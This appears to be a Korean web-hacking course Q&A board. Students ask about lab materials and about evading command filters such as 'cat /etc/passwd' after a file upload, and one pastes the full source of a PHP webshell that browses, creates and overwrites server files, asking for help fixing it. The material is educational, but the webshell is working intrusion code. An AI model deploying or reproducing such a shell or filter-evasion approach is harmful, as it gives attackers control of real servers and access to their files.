안녕하세요 강사님 강의가 매우 유익하여 강의랑은 별개의 내용으로 단순 질문이 있습니다.혹시 모바일 앱(IOS, Andriod)에 대한 취약점 진단 강의도 개설하실 의향이 있으실까요?

Bitnami WAMP이 단종되었는데 대체 방법이 있을까요??

안녕하세요. 혹시 파일업로드 후 명령어를 작성하는 폼태그에서 cat /etc/passwd와 같이 명령어를 작성했을때 해당 명령어를 감지해서 필터링하는 경우도 올려주신 난독화 기법 동일하게 적용하면 되는게 맞을까요?파일업로드 및 실행은 되나, 특정 명령어 작성 시 에러가 나는 경우입니다.!

다양한 실무 환경에서의 공격 방법 세번째 [압축 해제 환경에서 웹쉘 업로드] 실습해 보려고 하는데, 실습환경을 제공해주실 수 있나요?

상단에서 첨부 파일을 다운로드 받을 수 있으시다고 하셨는데 없는 것 같아서요. 어디서 다운로드 받을 수 있나요?

파일내용 수정이 안되고 내용이 없는 파일은 textarea 부분이 나타나지 않습니다.코드 작성본은 아래와 같습니다.해결할 수 있도록 도움 부탁드리겠습니다. <? header("Content-Type: text/html; charset=UTF-8"); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); $fileName = $_GET["fileName"]; if(empty($path)) { $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath); $path = str_replace("\\", "/", $path); } else { $path = realpath($path)."/"; $path = str_replace("\\", "/", $path); } # Mode Logic if ($mode == "fileCreate") { if(empty($fileName)) { echo "<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $fp = fopen($path.$fileName, "w"); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "dirCreate") { if(empty($fileName)) { echo "<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $dirPath = $path.$fileName; if(is_dir($dirPath)) { echo "<script>alert('해당 디렉터리명이 존재합니다.');history.back(-1);</script>"; exit(); } mkdir($dirPath); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "fileModify" && !empty($_POST["fileContents"])) { $filePath = $path.$fileName; if(!file_exists($filePath)) { echo "<script>alert('파일이 존재하지 않습니다..');history.back(-1);</script>"; exit(); } $fileContents = $_POST["fileContents"]; $fp = fopen($filePath, "w"); fputs($fp, $fileContents, strlen($fileContents)); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } # Directory List Return Function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } # File List Return Function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; }?><!DOCTYPE html><html lang="ko"></html><head> <title>godoks webshell test</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="">https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> <script> function fileCreate() { var fileName = frm.createFileName.value; if(!fileName) { alert("파일명을 입력하시오"); return; } location.href = "<?=$page?>?mode=fileCreate&path=<?=$path?>&fileName=" +fileName; } function dirCreate() { var fileName = frm.createFileName.value; if(!fileName) { alert("디렉터리명을 입력하시오"); return; } location.href = "<?=$page?>?mode=dirCreate&path=<?=$path?>&fileName=" +fileName; } function fileModify(fileName) { location.href = "<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=" +fileName; } </script></head><body><div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>GODOKS_HACKing</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <? if(empty($mode) || $mode == "fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation" <? if($mode == "fileUpload") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileUploadr">File Upload</a></li> <li role="presentation" <? if($mode == "command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execution</a></li> <li role="presentation" <? if($mode == "DB") echo "class=\"active\"";?>><a href="<?=$page?>?mode=DB">DB Connector</a></li> <li role="presentation"><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <form action="<?=$page?>"?mode=fileBrowsr" method="GET"> <? if(empty($mode) || $mode == "fileBrowser") { ?> <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path Input..." name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover" style="table-layout: fixed; word-break: break-all;"> <thead> <tr calss="active"> <th style="width: 50%" class="text-center">Name</th> <th style="width: 14%" class="text-center">Type</th> <th style="width: 18%" class="text-center">Date</th> <th style="width: 18%" class="text-center">Action</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] !=".") { $dirDate = date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align: middle" class="text-primary"><b><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span>&nbsp;&nbsp;<a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></b></td> <td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align: middle" class="text-center"> <? if($dirList[$i] !="..") {?> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-danger" title="Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> <? } ?> </td> </tr> <? } } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++) { $fileDate = date("Y-m-d H:i", filemtime($path.$fileList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-info" title="Download"><span class="glyphicon glyphicon-save" aria-hidden="true"></span></button> <button type="button" class="btn btn-warning" title="Modify" onclick="fileModify('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span></button> <button type="button" class="btn btn-danger" title="Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> </td> </tr> <? } ?> </tbody> </table> </div> <hr> <form name="frm"> <div class="input-group"> <input type="text" class="form-control" placeholder="File/Directory Name Input..." name="createFileName"> <span class="input-group-btn"> <button class="btn btn-default" type="button" onclick="fileCreate()">File Create</button> <button class="btn btn-default" type="button" onclick="dirCreate()">Directory Create</button> </span> </div> </form> <? } else if($mode == "fileModify") { ?> <? if(empty($fileName)) { echo "<script>alert('파일명이 존재하지 않습니다.');history.back(-1)</script>"; exit(); } $filePath = $path.$fileName; if(!file_exists($filePath)) { echo "<script>alert('파일이 존재하지 않습니다.');history.back(-1)</script>"; exit(); } $fp = fopen($filePath, "r"); $fileContents = fread($fp, filesize($filePath)); fclose($fp); ?> <form action="<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=<?=$fileName?>" method="POST"> <div class="input-group"> <input type="text" class="form-control" value="<?=$path?><?=$fileName?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">File Modify</button> </span> </div> <hr> <textarea class="form-control" rows="20" name="fileContents"><?=htmlspecialchars($fileContents)?></textarea> </form> <br> <p class="text-center"><button class="btn btn-default" type="button" onclick="history.back(-1);">Back</button></p> <? } ?> <hr> <p class="text-muted text-center">Copyrightⓒ 2023, godoks, All rights reserved.</p> </div> <div class="col-md-3"></div> </div></div></body></html>